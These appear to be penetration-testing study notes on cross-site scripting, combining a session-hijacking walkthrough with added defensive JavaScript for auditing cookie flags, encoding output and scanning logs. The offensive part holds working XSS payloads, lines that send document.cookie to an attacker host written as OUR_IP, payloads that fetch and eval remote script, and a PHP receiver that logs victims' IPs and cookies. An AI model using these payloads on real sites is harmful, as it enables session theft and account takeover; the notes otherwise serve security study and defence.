1.1 Cross Site Scripting

Caveat: if the HttpOnly flag is set on the cookie, document.cookie cannot read it, so it cannot be stolen this way.
More info: https://owasp.org/www-community/HttpOnly
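Defender-side check for the caveat above. This is an added example, not code from the original notes: it parses Set-Cookie headers and reports session cookies that lack HttpOnly (readable from document.cookie), Secure or a SameSite value. The session-cookie name list and the sample headers are constructed assumptions; extend the name list for the application under test.

```javascript
// Added example, not from the original notes: check Set-Cookie headers for the
// attributes that limit what a document.cookie-stealing payload can do.
// HttpOnly is the caveat above; Secure and SameSite narrow the blast radius.
// Cookie names and header samples below are constructed.

// Parse one Set-Cookie header value into {name, value, attributes}.
// Attribute names are lower-cased; flags without a value become `true`.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? '' : pair.slice(eq + 1),
    attributes: {},
  };
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Names that usually carry a session identifier (assumption: extend per app).
const SESSION_NAME_RE = /^(phpsessid|jsessionid|sessionid|session|sid|auth|token)$/i;

// Findings for one header; empty means the cookie is fine or not a session cookie.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!SESSION_NAME_RE.test(c.name)) return findings;
  const a = c.attributes;
  if (!a.httponly) findings.push('missing HttpOnly: value is readable from document.cookie');
  if (!a.secure) findings.push('missing Secure: cookie is also sent over plain HTTP');
  if (!a.samesite) findings.push('missing SameSite: browser default applies');
  else if (String(a.samesite).toLowerCase() === 'none') findings.push('SameSite=None: sent on cross-site requests');
  return findings;
}

// Audit a whole response: cookie name -> findings (only cookies with findings).
function auditSetCookieHeaders(headers) {
  const report = {};
  for (const h of headers) {
    const findings = auditSessionCookie(h);
    if (findings.length > 0) report[parseSetCookie(h).name] = findings;
  }
  return report;
}

// Constructed samples: a weak session cookie, a hardened one, a non-session cookie.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'sessionid=def456; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; Max-Age=31536000',
];

console.log(auditSetCookieHeaders(SAMPLE_HEADERS));
```

Run it against the Set-Cookie headers of a login response; only the first sample header produces findings, so a clean report means the cookie-theft payloads later in these notes have nothing to read.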

Reflected XSS: the input is sent to the backend and reflected back in the response.
http://test:45960/index.php?task=test

DOM XSS: processed completely on the client side by JavaScript (here the input sits in the URL fragment, which the browser never sends to the server).
http://test:33537/#task=test

<img src="" onerror=alert(document.cookie)>

<script>print()</script>
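Added example, not from the original notes: the reflected `?task=` and DOM `#task=` sinks above, simulated with strings under Node.js (no browser), with the vulnerable rendering next to the encoded one that neutralises the img/onerror payload. Function names and the `<h1>` wrapper are assumptions; the URLs and payload are the ones in the notes.

```javascript
// Added example, not from the original notes: the reflected (?task=) and DOM
// (#task=) sinks from the notes above, simulated with strings under Node.js,
// and the output encoding that neutralises the <img onerror> payload.

// HTML-encode the characters that can break out of an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Reflected XSS: the server reads ?task= from the request and echoes it.
// Vulnerable version: raw concatenation into the response body.
function renderTaskUnsafe(requestUrl) {
  const task = new URL(requestUrl).searchParams.get('task') ?? '';
  return `<h1>Task: ${task}</h1>`;
}

// Fixed version: encode before inserting into the HTML text context.
function renderTaskSafe(requestUrl) {
  const task = new URL(requestUrl).searchParams.get('task') ?? '';
  return `<h1>Task: ${escapeHtml(task)}</h1>`;
}

// DOM XSS: the value comes from location.hash, which the browser never sends
// to the server, so no server-side log or filter ever sees it.
function taskFromHash(pageUrl) {
  const hash = new URL(pageUrl).hash.replace(/^#/, '');
  return new URLSearchParams(hash).get('task') ?? '';
}

// Vulnerable sink: element.innerHTML = taskFromHash(location.href)
function domRenderUnsafe(pageUrl) {
  return { sink: 'innerHTML', html: `<h1>Task: ${taskFromHash(pageUrl)}</h1>` };
}

// Fixed sink: element.textContent = taskFromHash(location.href); the browser
// then shows the characters literally, which escapeHtml models here.
function domRenderSafe(pageUrl) {
  return { sink: 'textContent', html: `<h1>Task: ${escapeHtml(taskFromHash(pageUrl))}</h1>` };
}

// True if the markup contains any tag other than the expected <h1> wrapper,
// i.e. the payload survived as markup instead of text.
function hasUnexpectedTag(html) {
  return /<(?!\/?h1>)/.test(html);
}

// Demo with the payload from the notes above.
const PAYLOAD = '<img src="" onerror=alert(document.cookie)>';
console.log(renderTaskUnsafe('http://test:45960/index.php?task=' + PAYLOAD));
console.log(renderTaskSafe('http://test:45960/index.php?task=' + PAYLOAD));
console.log(domRenderSafe('http://test:33537/#task=' + PAYLOAD).html);
```

The point of the two DOM functions is the sink, not the encoding: in a real page the fix is assigning to textContent (or a templating call that encodes) instead of innerHTML, and the server-side fix for the reflected case is encoding at output time, not filtering at input time.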

Tools

https://github.com/s0md3v/XSStrike
https://github.com/rajeshmajumdar/BruteXSS
https://github.com/epsylon/xsser

Payloads

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md

https://github.com/payloadbox/xss-payload-list

Session Hijacking

Make the user click the link and steal the cookie.
Search for the right payload
Create index.php
Create script.js
Set up a PHP server that hosts index.php
Update script.js
Set up the payload so that it loads script.js; script.js then requests index.php with the cookie.

Blind XSS detection - the page that renders the input is usually viewed by certain users only. Common injection points:
Contact Forms
Reviews
User Details
Support Tickets
HTTP User-Agent header

Test each of these inputs with payloads such as:

<script src="http://OUR_IP/script.js"></script>
<script src="http://OUR_IP/username"></script>

script.js

Update with one of the following (replace OUR_IP with the server address; the first is silent, the second redirects the victim):

new Image().src='http://OUR_IP/index.php?c='+document.cookie;

document.location='http://OUR_IP/index.php?c='+document.cookie;

Load a remote script.js

# Serve the script, then inject a payload that points the target at it
$ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started

XSS samples - load a remote script (replace OUR_IP with the server address)

<script src=http://OUR_IP></script>

'><script src=http://OUR_IP></script>

"><script src=http://OUR_IP></script>

javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>

<script>$.getScript("http://OUR_IP")</script>
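Both the remote-script payloads above and the index.php?c= callback from the session-hijacking steps leave traces in request logs: the injected tag in the target's access log (or its User-Agent field for the blind case), and a cookie-shaped value in a query string wherever the victim's outbound request is logged (egress proxy or the receiving host). This is an added detection example, not code from the original notes; the log lines are constructed samples with RFC 5737 documentation addresses and the finding labels are my own.

```javascript
// Added example, not from the original notes: scan web-server access log lines
// (Apache combined format) for the traces the payloads above leave behind,
// so a defender can spot both the injection attempt and the cookie callback.
// All log lines below are constructed samples with RFC 5737 documentation IPs.

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Parse one combined-format line; returns null if the line does not match.
function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], uri: m[4],
           status: Number(m[5]), referer: m[6], userAgent: m[7] };
}

// Percent-decode repeatedly (payloads are often double-encoded), never throw.
function fullyDecode(s) {
  let prev, cur = s;
  for (let i = 0; i < 3 && prev !== cur; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch { break; }
  }
  return cur;
}

// Markers from the payload list above: script/img tags, event handlers,
// javascript: URLs, and the script-loading helpers.
const INJECTION_RE = /<\s*(script|img)\b|\bon(error|load|mouseover)\s*=|javascript:|\$\.getScript|XMLHttpRequest/i;
// A session-cookie-shaped value inside a query string, e.g. ?c=PHPSESSID=...
const COOKIE_IN_QUERY_RE = /[?&]\w+=(phpsessid|jsessionid|sessionid|session|sid|token)=[^&;\s]+/i;

// Return the parsed entry plus a list of finding labels (empty = nothing seen).
function inspectLogLine(line) {
  const entry = parseLogLine(line);
  if (!entry) return null;
  const findings = [];
  const uri = fullyDecode(entry.uri);
  if (INJECTION_RE.test(uri)) findings.push('xss-payload-in-uri');
  if (COOKIE_IN_QUERY_RE.test(uri)) findings.push('cookie-in-query-string');
  if (INJECTION_RE.test(fullyDecode(entry.userAgent))) findings.push('xss-payload-in-user-agent');
  return { ...entry, findings };
}

// Keep only the lines that produced at least one finding.
function scanLog(lines) {
  return lines.map(inspectLogLine).filter((e) => e !== null && e.findings.length > 0);
}

// Constructed sample log (not real traffic): a benign request, a reflected
// payload in ?task=, a cookie callback with the originating page as referer,
// and a blind-XSS probe in the User-Agent header.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?task=test HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?task=%3Cscript%20src%3Dhttp%3A%2F%2F198.51.100.7%2Fscript.js%3E%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
  '192.0.2.10 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?c=PHPSESSID%3Dabc123def456 HTTP/1.1" 200 0 "http://test:45960/index.php" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Oct/2023:13:57:15 +0000] "GET /contact HTTP/1.1" 200 300 "-" "<script src=http://198.51.100.7/useragent></script>"',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(`${hit.ip} ${hit.uri} -> ${hit.findings.join(', ')}`);
}
```

The decode step matters: a single-pass filter misses the double-encoded form, and the User-Agent check catches the blind-XSS probe that never appears in a URI at all. Stored payloads submitted in POST bodies are not visible in the access log; those need application-level logging or a WAF.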

Create index.php (appends every cookie received via ?c= to cookies.txt; the file must be writable by the user running the PHP server)

<?php
// script.js sends document.cookie as ?c=<cookies>; log each one with the client IP
if (isset($_GET['c'])) {
    // document.cookie is "name=value; name2=value2", so split on ";"
    $list = explode(";", $_GET['c']);
    foreach ($list as $value) {
        $cookie = urldecode(trim($value));
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>